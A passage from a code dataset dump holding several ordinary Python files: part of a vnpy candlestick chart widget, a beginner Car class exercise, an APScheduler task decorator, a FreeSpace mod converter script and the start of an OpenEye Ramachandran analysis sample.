self.candle = CandlestickItem(self.listBar)\n self.pwKL.addItem(self.candle)\n self.pwKL.setXLink('PlotOI' + self.name)\n self.pwKL.hideAxis('bottom')\n self.pwKL.setMinimumHeight((self.rect().height()-30)/3)\n\n self.lay_KL.nextRow()\n self.lay_KL.addItem(self.pwKL)\n\n # ----------------------------------------------------------------------\n def initplotOI(self):\n \"\"\"初始化持仓量子图\"\"\"\n self.pwOI = self.makePI('PlotOI' + self.name)\n self.curveOI = self.pwOI.plot()\n self.pwOI.setMaximumHeight((self.rect().height() - 30) / 4)\n self.pwOI.setMinimumHeight(20)\n\n self.lay_KL.nextRow()\n 
self.lay_KL.addItem(self.pwOI)\n\n\n self.indicatorsFunManage.addIndicators(\"OPI\")\n\n # ----------------------------------------------------------------------\n # 画图相关\n # ----------------------------------------------------------------------\n def plotVol(self, redraw=False, xmin=0, xmax=-1):\n \"\"\"重画成交量子图\"\"\"\n if self.initCompleted:\n self.volume.generatePicture(self.listVol[xmin:xmax], redraw) # 画成交量子图\n\n # ----------------------------------------------------------------------\n def plotKline(self, redraw=False, xmin=0, xmax=-1):\n \"\"\"重画K线子图\"\"\"\n if self.initCompleted:\n self.candle.generatePicture(self.listBar[xmin:xmax], redraw) # 画K线\n self.plotMark() # 显示开平仓信号位置\n\n # ----------------------------------------------------------------------\n def plotOI(self, xmin=0, xmax=-1):\n \"\"\"重画持仓量子图\"\"\"\n if self.initCompleted:\n # self.curveOI.setData(self.listOpenInterest[xmin:xmax]+[0], symbol='o', name=\"OpenInterest\")\n self.curveOI.setData(self.listOpenInterest[xmin:xmax] + [0],\n name=\"OpenInterest\" + self.name) # 去除symbol='o'\n\n def initIndicator(self, name):\n # 加载指标\n\n self.indicatorsFunManage.addIndicators(name)\n\n self.updateAll()\n\n\n\n # ----------------------------------------------------------------------\n def addSig(self, sig):\n \"\"\"新增信号图\"\"\"\n if sig in self.sigPlots:\n self.pwKL.removeItem(self.sigPlots[sig])\n self.sigPlots[sig] = self.pwKL.plot()\n self.sigColor[sig] = self.allColor[0]\n self.allColor.append(self.allColor.popleft())\n\n # ----------------------------------------------------------------------\n def showSig(self, datas):\n \"\"\"刷新信号图\"\"\"\n for sig in self.sigPlots:\n self.sigData[sig] = datas[sig]\n\n [self.sigPlots[sig].setData(datas[sig], pen=self.sigColor[sig][0], name=sig) \\\n for sig in self.sigPlots] # if sig in datas]\n\n # ----------------------------------------------------------------------\n def plotMark(self):\n \"\"\"显示开平仓信号\"\"\"\n # 检查是否有数据\n if len(self.datas) == 0:\n return\n for arrow in self.arrows:\n self.pwKL.removeItem(arrow)\n # 画买卖信号\n for i in range(len(self.listSig)):\n if self.listSig[i]:\n direction = self.listSig[i][\"direction\"]\n offset = self.listSig[i][\"offset\"]\n price = self.listSig[i][\"price\"]\n\n if direction == \"空\" and offset == \"开仓\":\n # arrow = pg.ArrowItem(pos=(i, price), angle=-90, brush=(255, 0, 0))\n arrow = pg.ArrowItem(pos=(i, price), angle=180, tipAngle=60, headLen=8, tailLen=3, tailWidth=5,\n pen={'color': 'w', 'width': 1}, brush='b')\n elif direction == \"多\" and offset == \"开仓\":\n # arrow = pg.ArrowItem(pos=(i, price), angle=90, brush=(255, 0, 0))\n arrow = pg.ArrowItem(pos=(i, price), angle=180, tipAngle=60, headLen=8, tailLen=3, tailWidth=5,\n pen={'color': 'w', 'width': 1}, brush='r')\n elif direction == \"空\" and offset == \"平仓\":\n # arrow = pg.ArrowItem(pos=(i, price), angle=-90, brush=(0, 0, 255))\n arrow = pg.ArrowItem(pos=(i, price), angle=0, tipAngle=40, headLen=8, tailLen=None, tailWidth=8,\n pen={'color': 'w', 'width': 1}, brush='b')\n elif direction == \"多\" and offset == \"平仓\":\n # arrow = pg.ArrowItem(pos=(i, price), angle=90, brush=(0, 0, 255))\n arrow = pg.ArrowItem(pos=(i, price), angle=0, tipAngle=40, headLen=8, tailLen=None, tailWidth=8,\n pen={'color': 'w', 'width': 1}, brush='r')\n self.pwKL.addItem(arrow)\n self.arrows.append(arrow)\n\n # ----------------------------------------------------------------------\n def updateAll(self):\n \"\"\"\n 手动更新所有K线图形,K线播放模式下需要\n \"\"\"\n datas = self.datas\n self.volume.update()\n self.candle.update()\n\n 
def update(view, low, high):\n vRange = view.viewRange()\n xmin = max(0, int(vRange[0][0]))\n xmax = max(0, int(vRange[0][1]))\n xmax = min(xmax, len(datas))\n if len(datas) > 0 and xmax > xmin:\n ymin = min(datas[xmin:xmax][low])\n ymax = max(datas[xmin:xmax][high])\n if ymin and ymax:\n view.setRange(yRange=(ymin, ymax))\n else:\n view.setRange(yRange=(0, 1))\n\n update(self.pwKL.getViewBox(), 'low', 'high')\n #update(self.pwVol.getViewBox(), 'volume', 'volume')\n #update(self.pwOI.getViewBox(), 'openInterest', 'openInterest')\n #update(self.curveOI.getViewBox(), 'openInterest', 'openInterest')\n self.update_vicefigure2(datas)\n\n def update_vicefigure2(self,datas):\n ##附图2更新\n def update_2(view,indicatorsFunManage):\n vRange = view.viewRange()\n xmin = max(0, int(vRange[0][0]))\n xmax = max(0, int(vRange[0][1]))\n xmax = min(xmax, len(datas))\n if len(datas) > 0 and xmax > xmin:\n ymin,ymax = indicatorsFunManage.getYRange(xmin,xmax,\"vicefigure2\")\n if ymin and ymax:\n view.setRange(yRange=(ymin, ymax))\n else:\n view.setRange(yRange=(0, 1))\n update_2(self.curveOI.getViewBox(), self.indicatorsFunManage )\n\n\n\n # ----------------------------------------------------------------------\n def plotAll(self, redraw=True, xMin=0, xMax=-1):\n \"\"\"\n 重画所有界面\n redraw :False=重画最后一根K线; True=重画所有\n xMin,xMax : 数据范围\n \"\"\"\n # xMax = len(self.datas) if xMax < 0 else xMax\n # self.countK = xMax-xMin\n # self.index = int((xMax+xMin)/2)\n if redraw:\n xmax = len(self.datas) if xMax < 0 else xMax\n xmin=max(0,xmax-self.countK)\n self.index = int((xmax + xmin) / 2)\n self.pwOI.setLimits(xMin=xMin, xMax=xMax)\n self.pwKL.setLimits(xMin=xMin, xMax=xMax)\n self.pwVol.setLimits(xMin=xMin, xMax=xMax)\n self.plotKline(redraw, xMin, xMax) # K线图\n self.plotVol(redraw, xMin, xMax) # K线副图,成交量\n self.plotOI(0, len(self.datas)) # K线副图,持仓量\n self.refresh()\n\n def refreshHeight(self):\n # super.__init__(QResizeEvent)\n # 如果窗口最大化,不修改比例,防御性设计\n # if self.isMaximized():\n # return\n if len(self.datas)!=0:\n height =self.rect().height()\n if height!=self.oldsize:\n self.oldsize=height\n height=(height-30)/4\n\n self.pwKL.setMinimumHeight(height * 2-24)\n self.pwVol.setMaximumHeight(height)\n self.pwVol.setMinimumHeight(12)\n self.pwOI.setMaximumHeight(height)\n self.pwOI.setMinimumHeight(12)\n\n #print height\n\n\n # ----------------------------------------------------------------------\n def refresh(self):\n \"\"\"\n 刷新三个子图的现实范围\n \"\"\"\n datas = self.datas\n minutes = int(self.countK / 2)\n xmin = max(0, self.index - minutes)\n xmax = xmin + 2 * minutes\n self.pwOI.setRange(xRange=(xmin, xmax))\n self.pwKL.setRange(xRange=(xmin, xmax))\n self.pwVol.setRange(xRange=(xmin, xmax))\n\n # ----------------------------------------------------------------------\n # 快捷键相关\n # ----------------------------------------------------------------------\n def onNxt(self):\n \"\"\"跳转到下一个开平仓点\"\"\"\n if len(self.listSig) > 0 and not self.index is None:\n datalen = len(self.listSig)\n self.index += 1\n while self.index < datalen and self.listSig[self.index] == 0:\n self.index += 1\n self.refresh()\n x = self.index\n y = self.datas[x]['close']\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onPre(self):\n \"\"\"跳转到上一个开平仓点\"\"\"\n if len(self.listSig) > 0 and not self.index is None:\n self.index -= 1\n while self.index > 0 and self.listSig[self.index] == 0:\n self.index -= 1\n self.refresh()\n x = self.index\n y = self.datas[x]['close']\n 
self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onDown(self):\n \"\"\"放大显示区间\"\"\"\n self.countK = min(len(self.datas), int(self.countK * 1.2) + 1)\n self.refresh()\n if len(self.datas) > 0:\n x = self.index - self.countK / 2 + 2 if int(\n self.crosshair.xAxis) < self.index - self.countK / 2 + 2 else int(self.crosshair.xAxis)\n x = self.index + self.countK / 2 - 2 if x > self.index + self.countK / 2 - 2 else x\n x=min(x,len(self.datas)-1)\n y = self.datas[x][2]\n # y = self.datas[x]['close']\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onUp(self):\n \"\"\"缩小显示区间\"\"\"\n # self.countK = max(3,int(self.countK/1.2)-1)\n self.countK = max(20, int(self.countK / 1.2) - 1) # 最小显示k线范围20\n self.refresh()\n if len(self.datas) > 0:\n x = self.index - self.countK / 2 + 2 if int(\n self.crosshair.xAxis) < self.index - self.countK / 2 + 2 else int(self.crosshair.xAxis)\n x = self.index + self.countK / 2 - 2 if x > self.index + self.countK / 2 - 2 else x\n x = min(x, len(self.datas)-1)\n y = self.datas[x]['close']\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onLeft(self):\n \"\"\"向左移动\"\"\"\n if len(self.datas) > 0 and int(self.crosshair.xAxis) > 2:\n x = int(self.crosshair.xAxis) - 1\n y = self.datas[x]['close']\n if x <= self.index - self.countK / 2 + 2 and self.index > 1:\n self.index -= 1\n self.refresh()\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n def onRight(self):\n \"\"\"向右移动\"\"\"\n if len(self.datas) > 0 and int(self.crosshair.xAxis) < len(self.datas) - 1:\n x = int(self.crosshair.xAxis) + 1\n y = self.datas[x]['close']\n if x >= self.index + int(self.countK / 2) - 2:\n self.index += 1\n self.refresh()\n self.crosshair.signal.emit((x, y))\n\n # ----------------------------------------------------------------------\n # 界面回调相关\n # ----------------------------------------------------------------------\n def onPaint(self):\n \"\"\"界面刷新回调\"\"\"\n view = self.pwKL.getViewBox()\n vRange = view.viewRange()\n # xmin = max(0,int(vRange[0][0]))\n # xmax = max(0,int(vRange[0][1]))\n # self.index = int((xmin+xmax)/2)+1\n\n # ----------------------------------------------------------------------\n def resignData(self, datas):\n \"\"\"更新数据,用于Y坐标自适应\"\"\"\n self.crosshair.datas = datas\n\n def viewXRangeChanged(low, high, self):\n vRange = self.viewRange()\n xmin = max(0, int(vRange[0][0]))\n xmax = max(0, int(vRange[0][1]))\n xmax = min(xmax, len(datas))\n if len(datas) > 0 and xmax > xmin:\n ymin = min(datas[xmin:xmax][low])\n ymax = max(datas[xmin:xmax][high])\n if ymin and ymax:\n self.setRange(yRange=(ymin, ymax))\n else:\n self.setRange(yRange=(0, 1))\n\n view = self.pwKL.getViewBox()\n view.sigXRangeChanged.connect(partial(viewXRangeChanged, 'low', 'high'))\n view = self.pwVol.getViewBox()\n view.sigXRangeChanged.connect(partial(viewXRangeChanged, 'volume', 'volume'))\n\n\n ##附图2更新\n self.resign_vicefigure2(datas)\n\n def resign_vicefigure2(self,datas):\n ##附图2更新\n def viewXRangeChanged_2(indicatorsFunManage, self):\n vRange = self.viewRange()\n xmin = max(0, int(vRange[0][0]))\n xmax = max(0, int(vRange[0][1]))\n xmax = min(xmax, len(datas))\n if len(datas) > 0 and xmax > xmin:\n ymin,ymax = indicatorsFunManage.getYRange(xmin,xmax,\"vicefigure2\")\n if ymin and ymax:\n self.setRange(yRange=(ymin, ymax))\n else:\n 
self.setRange(yRange=(0, 1))\n\n view = self.pwOI.getViewBox()\n view.sigXRangeChanged.connect(partial(viewXRangeChanged_2, self.indicatorsFunManage))\n\n # ----------------------------------------------------------------------\n # 数据相关\n # ----------------------------------------------------------------------\n def clearData(self):\n \"\"\"清空数据\"\"\"\n # 清空数据,重新画图\n self.time_index = []\n self.listBar = []\n self.listVol = []\n self.listLow = []\n self.listHigh = []\n self.listOpenInterest = []\n self.listSig = []\n self.sigData = {}\n self.arrows = []\n self.datas = None\n self.sarDatas=None\n\n # ----------------------------------------------------------------------\n def updateSig(self, sig):\n \"\"\"刷新买卖信号\"\"\"\n self.listSig = sig\n self.plotMark()\n # ----------------------------------------------------------------------\n def onBar(self, bar, nWindow=20):\n \"\"\"\n 新增K线数据,K线播放模式\n nWindow : 最大数据窗口\n \"\"\"\n # 是否需要更新K线\n newBar = False if len(self.datas) > 0 and bar.datetime == self.datas[-1].datetime else True\n nrecords = len(self.datas) if newBar else len(self.datas) - 1\n bar.openInterest = np.random.randint(0,\n 3) if bar.openInterest == np.inf or bar.openInterest == -np.inf else bar.openInterest\n recordVol = (nrecords, bar.volume, 0, 0, bar.volume) if bar.close < bar.open else (\n nrecords, 0, bar.volume, 0, bar.volume)\n if newBar and any(self.datas):\n self.datas.resize(nrecords + 1, refcheck=0)\n self.listBar.resize(nrecords + 1, refcheck=0)\n self.listVol.resize(nrecords + 1, refcheck=0)\n elif any(self.datas):\n self.listClose.pop()\n self.listOpen.pop()\n self.listLow.pop()\n self.listHigh.pop()\n self.listOpenInterest.pop()\n if any(self.datas):\n self.datas[-1] = (bar.datetime, bar.open, bar.close, bar.low, bar.high, bar.volume, bar.openInterest)\n self.listBar[-1] = (nrecords, bar.open, bar.close, bar.low, bar.high)\n self.listVol[-1] = recordVol\n else:\n self.datas = np.rec.array(\n [(datetime, bar.open, bar.close, bar.low, bar.high, bar.volume, bar.openInterest)], \\\n names=('datetime', 'open', 'close', 'low', 'high', 'volume', 'openInterest'))\n self.listBar = np.rec.array([(nrecords, bar.open, bar.close, bar.low, bar.high)], \\\n names=('datetime', 'open', 'close', 'low', 'high'))\n self.listVol = np.rec.array([recordVol], names=('datetime', 'open', 'close', 'low', 'high'))\n self.resignData(self.datas)\n self.axisTime.update_xdict({nrecords: bar.datetime})\n self.listOpen.append(bar.open)\n self.listClose.append(bar.close)\n self.listLow.append(bar.low)\n self.listHigh.append(bar.high)\n self.listOpenInterest.append(bar.openInterest)\n # if newBar:\n # xMax = nrecords + 1\n # xMin = max(0, xMax - self.countK) # 最小显示区间\n # self.index=int(xMax+xMin)/2\n\n # if self.pwKL.getViewBox().mousePress == True:\n # print(\"sssssssssss\")\n\n # if self.pwKL.getViewBox().mousePress == False: ##self.mousePress==false,不在执行刷新操作\n\n\n\n xMax = self.index + self.countK\n xMin = self.index - self.countK\n #xMin=(0,xMin)\n if xMin<0:\n xMin=0\n\n if not newBar:\n self.updateAll()\n\n self.plotAll(False, xMin, xMax)\n self.crosshair.signal.emit((None, None))\n if self.indicatorsFunManage:\n self.indicatorsFunManage.updateIndicators()\n\n # ----------------------------------------------------------------------\n def loadData(self, datas):\n \"\"\"\n 载入pandas.DataFrame数据\n datas : 数据格式,cols : datetime, open, close, low, high\n \"\"\"\n # 设置中心点时间\n self.index = 0\n\n # 绑定数据,更新横坐标映射,更新Y轴自适应函数,更新十字光标映射\n datas['time_int'] = np.array(range(len(datas.index)))\n self.datas = 
datas[['open', 'close', 'low', 'high', 'volume', 'openInterest']].to_records()\n self.axisTime.xdict = {}\n xdict = dict(enumerate(datas.index.tolist()))\n self.axisTime.update_xdict(xdict)\n self.resignData(self.datas)\n # 更新画图用到的数据\n self.listBar = datas[['time_int', 'open', 'close', 'low', 'high']].to_records(False)\n self.listOpen=list(datas['open'])\n self.listClose=list(datas['close'])\n self.listHigh = list(datas['high'])\n self.listLow = list(datas['low'])\n self.listOpenInterest = list(datas['openInterest'])\n # 成交量颜色和涨跌同步,K线方向由涨跌决定\n datas0 = pd.DataFrame()\n datas0['open'] = datas.apply(lambda x: 0 if x['close'] >= x['open'] else x['volume'], axis=1)\n datas0['close'] = datas.apply(lambda x: 0 if x['close'] < x['open'] else x['volume'], axis=1)\n datas0['low'] = datas0['open']\n datas0['high'] = datas0['close']\n datas0['time_int'] = np.array(range(len(datas.index)))\n self.listVol = datas0[['time_int', 'open', 'close', 'low', 'high']].to_records(False)\n # 调用画图函数\n self.plotAll(True, 0, len(self.datas))\n\n def loadDataBar(self, datas):\n \"\"\"\n 载入pandas.DataFrame数据\n datas : 数据格式,'symbol','vtSymbol','exchange','open','high','low','close','date','time1','datetime','volume','openInterest'\n \"\"\"\n print(datas)\n self.index = 0\n\n # 绑定数据,更新横坐标映射,更新Y轴自适应函数,更新十字光标映射\n datas['time_int'] = np.array(range(len(datas.index)))\n\n self.datas = datas[['datetime', 'open', 'close', 'low', 'high', 'volume', 'openInterest']].to_records(False)\n # self.datas = datas[['symbol','vtSymbol','exchange','open','high','low','close','date','time1','datetime','volume','openInterest']].to_records()\n self.axisTime.xdict = {}\n # xdict = dict(enumerate(datas.index.tolist()))\n xdict = dict(enumerate(datas['datetime'].tolist()))\n self.axisTime.update_xdict(xdict)\n self.resignData(self.datas)\n # 更新画图用到的数据\n self.listBar = datas[['time_int', 'open', 'close', 'low', 'high']].to_records(False)\n self.listOpen = list(datas['open'])\n self.listClose = list(datas['close'])\n self.listHigh = list(datas['high'])\n self.listLow = list(datas['low'])\n self.listOpenInterest = list(datas['openInterest'])\n # 成交量颜色和涨跌同步,K线方向由涨跌决定\n datas0 = pd.DataFrame()\n datas0['open'] = datas.apply(lambda x: 0 if x['close'] >= x['open'] else x['volume'], axis=1)\n datas0['close'] = datas.apply(lambda x: 0 if x['close'] < x['open'] else x['volume'], axis=1)\n datas0['low'] = datas0['open']\n datas0['high'] = datas0['close']\n datas0['time_int'] = np.array(range(len(datas.index)))\n self.listVol = datas0[['time_int', 'open', 'close', 'low', 'high']].to_records(False)\n # 调用画图函数\n self.plotAll(True, 0, len(self.datas))\n\n ##VtBarData 结构\n def loadDataBarArray(self, record):\n txtData = pd.DataFrame.from_records(record, index=\"datetime\")\n # txtData = txtData.rename(columns = {0:'symbol', 1:\"vtSymbol\",2:\"exchange\",3:\"open\",4:\"high\",5:\"low\",6:\"close\",7:\"date\",8:\"time\",9:\"datetime\",10:\"volume\",11:\"openInterest\"})\n\n self.loadData(txtData)\n\n\n\n########################################################################\n# 功能测试\n########################################################################\nimport sys\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n # 界面设置\n cfgfile = QtCore.QFile('css.qss')\n cfgfile.open(QtCore.QFile.ReadOnly)\n styleSheet = cfgfile.readAll()\n styleSheet = unicode(styleSheet, encoding='utf8')\n app.setStyleSheet(styleSheet)\n # K线界面\n # ui = KLineWidget()\n # ui.show()\n # ui.KLtitle.setText('rb1701',size='20pt')\n # 
ui.loadData(pd.DataFrame.from_csv('data.csv'))\n\n ui = KLineWidget(name=\"opt\")\n ui.show()\n ui.KLtitle.setText('rb1701', size='20pt')\n\n # txtData = pd.DataFrame.from_csv('D:/data/day/rb1101.txt',header=None,index_col=7)\n txtData = pd.DataFrame.from_csv('E:/Data/day/rb1101.txt', header=None, index_col=7)\n\n\n\n txtData = txtData.rename(\n columns={0: 'symbol', 1: \"vtSymbol\", 2: \"exchange\", 3: \"open\", 4: \"high\", 5: \"low\", 6: \"close\", 7: \"date\",\n 8: \"time\", 9: \"datetime\", 10: \"volume\", 11: \"openInterest\"})\n\n ui.loadDataBar(txtData)\n app.exec_()\n","sub_path":"vnpy/trader/widget/uiKLine.py","file_name":"uiKLine.py","file_ext":"py","file_size_in_byte":40092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"490648334","text":"# Create a class called Car. In the __init__(), allow the user to specify the following attributes: price, speed, fuel, mileage. If the price is greater than 10,000, set the tax to be 15%. Otherwise, set the tax to be 12%.\n\n# Create six different instances of the class Car. In the class have a method called display_all() that returns all the information about the car as a string. In your __init__(), call this display_all() method to display information about the car once the attributes have been defined.\n\nclass Car:\n\tdef __init__(self, price, speed, fuel, mileage):\n\t\tself.price = price\n\t\tself.speed = speed\n\t\tself.fuel = fuel\n\t\tself.mileage = mileage\n\t\tself.tax = 0\n\tdef taxed(self):\n\t\tif self.price > 10000:\n\t\t\tself.tax = 0.15\n\t\telse:\n\t\t\tself.tax = 0.12\n\t\tprint(self.tax)\n\t\treturn self\n\tdef display_all(self):\n\t\tprint(f\"Price: {self.price} \\nSpeed: {self.speed} \\nFuel: {self.fuel} \\nMileage: {self.mileage} \\nTax: {self.tax}\")\ncar1 = Car(2000, 35, \"Full\", 15)\ncar2 = Car(2000, 5, \"Not Full\", 105)\ncar3 = Car(2000, 15, \"Kind of Full\", 95)\ncar4 = Car(2000, 25, \"Full\", 25)\ncar5 = Car(2000, 45, \"Empty\", 25)\ncar6 = Car(20000000, 35, \"Empty\", 15)","sub_path":"python_OOP/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440614431","text":"from datetime import date\n\nfrom loop import event_loop\nfrom .scheduler import scheduler\n\nDATE_TASK = 0\nCRON_TASK = 1\n\n\nclass APTask:\n def __init__(self, task_type, fn):\n self.task_type = task_type\n self.fn = fn\n self.job = None\n\n async def start(self, run_datetime=None, cron_rule=None,\n args=(), kwargs=None,\n *targs, **tkwargs):\n if self.task_type == DATE_TASK:\n if not isinstance(run_datetime, date):\n raise Exception(\n 'run_datetime param is not date/datetime instance'\n )\n self.job = await event_loop.run_in_executor(\n None,\n lambda: scheduler.add_job(\n self.fn, 'date',\n args=args,\n kwargs=kwargs or {},\n run_date=run_datetime,\n *targs, **tkwargs\n )\n )\n elif self.task_type == CRON_TASK:\n self.job = await event_loop.run_in_executor(\n None,\n lambda: scheduler.add_job(\n self.fn, 'cron',\n args=args,\n kwargs=kwargs,\n *targs,\n **dict(tkwargs, **cron_rule)\n )\n )\n else:\n raise Exception('Unknown type of task')\n\n\ndef bg_task(task_type):\n def dec(fn):\n fn.task = APTask(task_type, fn)\n return fn\n\n return dec\n","sub_path":"background/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"444373655","text":"## Copyright 2014 ngld \n##\n## Licensed under the Apache License, Version 2.0 (the \"License\");\n## you may not use this file except in compliance with the License.\n## You may obtain a copy of the License at\n##\n## http://www.apache.org/licenses/LICENSE-2.0\n##\n## Unless required by applicable law or agreed to in writing, software\n## distributed under the License is distributed on an \"AS IS\" BASIS,\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n## See the License for the specific language governing permissions and\n## limitations under the License.\n\nfrom __future__ import print_function\nimport logging\nlogging.basicConfig(level=logging.INFO, format='%(levelname)s:%(threadName)s:%(module)s.%(funcName)s: %(message)s')\nlogging.getLogger().addHandler(logging.FileHandler('converter.log'))\n\nimport sys\nimport os\nimport argparse\nimport pickle\nimport hashlib\nimport json\nimport time\nimport datetime\nimport signal\nimport util\nimport progress\nfrom fso_parser import EntryPoint\nfrom fs2mod import convert_modtree, find_mod, ModInfo2\nfrom qt import QtCore\nfrom six import StringIO\n\n\ndef show_progress(prog, text):\n sys.stdout.write('\\r %3d%% %s' % (prog * 100, text))\n sys.stdout.flush()\n\ncache = {\n 'mods': {},\n 'last_fetch': 0\n}\ncache_path = os.path.expanduser('~/.fs2mod-py/cache.pick')\n\n\ndef list_modtree(mods, level=0):\n for mod in mods:\n print(' ' * 2 * level + mod.name)\n list_modtree(mod.submods, 1)\n\n\ndef main(args):\n global cache, cache_path\n \n progress.reset()\n progress.set_callback(show_progress)\n \n parser = argparse.ArgumentParser()\n subs = parser.add_subparsers(dest='action')\n \n list_parser = subs.add_parser('list', help='list mods')\n list_parser.add_argument('--update', action='store_true', default=False, help='update the mod list')\n \n convert_parser = subs.add_parser('convert', help='generates a fs2mod file for one of the listed mods')\n convert_parser.add_argument('modname')\n convert_parser.add_argument('outpath', help='path to the fs2mod file')\n \n json_parser = subs.add_parser('json', help='generate a json file for the passed mods')\n json_parser.add_argument('modname', nargs='+', help='several names of mods or just \"all\"')\n json_parser.add_argument('-o', dest='outpath', help='output file', type=argparse.FileType('w'), default=sys.stdout)\n json_parser.add_argument('-p', dest='pretty', help='pretty print the output', action='store_true')\n \n args = parser.parse_args(args)\n \n # Load our cache\n if os.path.exists(cache_path):\n with open(cache_path, 'rb') as stream:\n try:\n cache = pickle.load(stream)\n except:\n logging.exception('Failed to read the cache at %s!', cache_path)\n \n if args.action == 'list':\n if args.update or len(cache['mods']) == 0:\n logging.info('Fetching current mod list...')\n \n cache['mods'] = EntryPoint.get_mods()\n cache['last_fetch'] = time.time()\n \n # Save the updated cache.\n if not os.path.isdir(os.path.dirname(cache_path)):\n os.makedirs(os.path.dirname(cache_path))\n \n with open(cache_path, 'wb') as stream:\n pickle.dump(cache, stream)\n \n ftime = datetime.datetime.fromtimestamp(cache['last_fetch'])\n print('This list was last updated on ' + ftime.strftime('%c'))\n list_modtree(cache['mods'])\n \n elif args.action == 'convert':\n if os.path.exists(args.outpath):\n logging.error('\"%s\" already exists! 
I won\\'t overwrite it!', args.outpath)\n return\n \n # Look for the mod...\n mod = find_mod(cache['mods'], args.modname)\n if mod is None:\n logging.error('Couldn\\'t find mod \"%s\"!', args.modname)\n return\n \n logging.info('Converting mod...')\n mod = convert_modtree([mod])[0]\n \n logging.info('Writing fs2mod file...')\n mod.generate_zip(args.outpath)\n \n logging.info('Done!')\n \n elif args.action == 'json':\n # Look for our mods\n \n if 'all' in args.modname:\n mods = cache['mods']\n else:\n mods = []\n for mod in args.modname:\n m = find_mod(cache['mods'], mod)\n if m is None:\n logging.warning('Mod \"%s\" was not found!', mod)\n else:\n mods.append(m)\n \n if len(mods) < 1:\n logging.error('No mods to convert!')\n return\n \n app = QtCore.QCoreApplication([])\n \n class ConvertTask(progress.Task):\n def work(self, mod):\n self.add_work(mod.submods)\n \n result = ModInfo2()\n cur = mod\n while cur.parent is not None:\n cur = cur.parent\n if cur.name != '':\n result.dependencies.append(('mod_name', cur.name))\n \n for i, sub in enumerate(mod.submods):\n mod.submods[i] = sub.name\n \n result.read(mod)\n self.post(result)\n \n master = progress.Master()\n task = ConvertTask()\n task.add_work(mods)\n \n def update_progress():\n total, items = task.get_progress()\n text = []\n for item in items.values():\n text.append('%3d%% %s' % (item[0] * 100, item[1]))\n \n progress.update(total, '\\n'.join(text))\n \n def finish():\n app.quit()\n \n task.progress.connect(update_progress)\n task.done.connect(finish)\n \n def core():\n signal.signal(signal.SIGINT, lambda a, b: app.quit())\n master.start_workers(5)\n master.add_task(task)\n app.exec_()\n master.stop_workers()\n \n util.QUIET = True\n out = StringIO()\n progress.init_curses(core, out)\n sys.stdout.write(out.getvalue())\n \n mods = {}\n if hasattr(args.outpath, 'name'):\n outpath = args.outpath.name\n else:\n outpath = None\n \n for mod in task.get_results():\n mods[mod.name] = mod.__dict__\n \n if mod.logo is not None:\n if outpath is None:\n del mods[mod.name]['logo']\n logging.warning('Skipping logo for \"%s\" because the output is stdout.', mod.name)\n else:\n dest = outpath + '.' + hashlib.md5(mod.logo).hexdigest() + '.jpg'\n with open(dest, 'wb') as stream:\n stream.write(mod.logo)\n \n mods[mod.name]['logo'] = os.path.basename(dest)\n\n if mod.parent is not None:\n mods[mod.name]['parent'] = mod.parent.name\n \n if args.pretty:\n json.dump(mods, args.outpath, indent=4)\n else:\n json.dump(mods, args.outpath, separators=(',', ':'))\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":7293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"488531106","text":"#!/usr/bin/env python\n# (C) 2017 OpenEye Scientific Software Inc. All rights reserved.\n\n# TERMS FOR USE OF SAMPLE CODE The software below (\"Sample Code\") is\n# provided to current licensees or subscribers of OpenEye products or\n# SaaS offerings (each a \"Customer\").\n# Customer is hereby permitted to use, copy, and modify the Sample Code,\n# subject to these terms. OpenEye claims no rights to Customer's\n# modifications. Modification of Sample Code is at Customer's sole and\n# exclusive risk. Sample Code may require Customer to have a then\n# current license or subscription to the applicable OpenEye offering.\n# THE SAMPLE CODE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED. 
OPENEYE DISCLAIMS ALL WARRANTIES, INCLUDING, BUT\n# NOT LIMITED TO, WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\n# PARTICULAR PURPOSE AND NONINFRINGEMENT. In no event shall OpenEye be\n# liable for any damages or liability in connection with the Sample Code\n# or its use.\n\n########################################################################\n# Perform a ramachandran analysis on your protein, print outliers\n########################################################################\n\nimport sys\nfrom openeye import oechem\n\n\ndef RamaCheck(mol):\n # @ \n # Loop over the CA atoms in the protein\n for atom in mol.GetAtoms(oechem.OEIsCAlpha()):\n rama = oechem.OERamachandranAnalysis(atom)\n # Print out information about outliers for further analysis\n if rama.GetRamaCategory() == oechem.OERamaCategory_Outlier:\n res = oechem.OEAtomGetResidue(atom)\n print(\"Found: {}\".format(oechem.OEGetRamachandranCategoryName(rama.GetRamaCategory())))\n print(\" Residue: {} {} {}\"\n .format(res.GetName(), res.GetResidueNumber(), res.GetChainID()))\n ramatype = oechem.OEGetRamachandranTypeName(rama.GetRamaType())\n print(\" Type: {}, Score: {}\".format(ramatype, rama.GetRamaScore()))\n # @ \n\n\ndef ReadProteinFromPDB(pdb_file, mol):\n ifs = oechem.oemolistream()\n flavor = oechem.OEIFlavor_PDB_Default | oechem.OEIFlavor_PDB_DATA | oechem.OEIFlavor_PDB_ALTLOC\n ifs.SetFlavor(oechem.OEFormat_PDB, flavor)\n\n if not ifs.open(pdb_file):\n oechem.OEThrow.Fatal(\"Unable to open %s for reading.\" % pdb_file)\n\n temp_mol = oechem.OEGraphMol()\n if not oechem.OEReadMolecule(ifs, temp_mol):\n oechem.OEThrow.Fatal(\"Unable to read molecule from %s.\" % pdb_file)\n ifs.close()\n\n fact 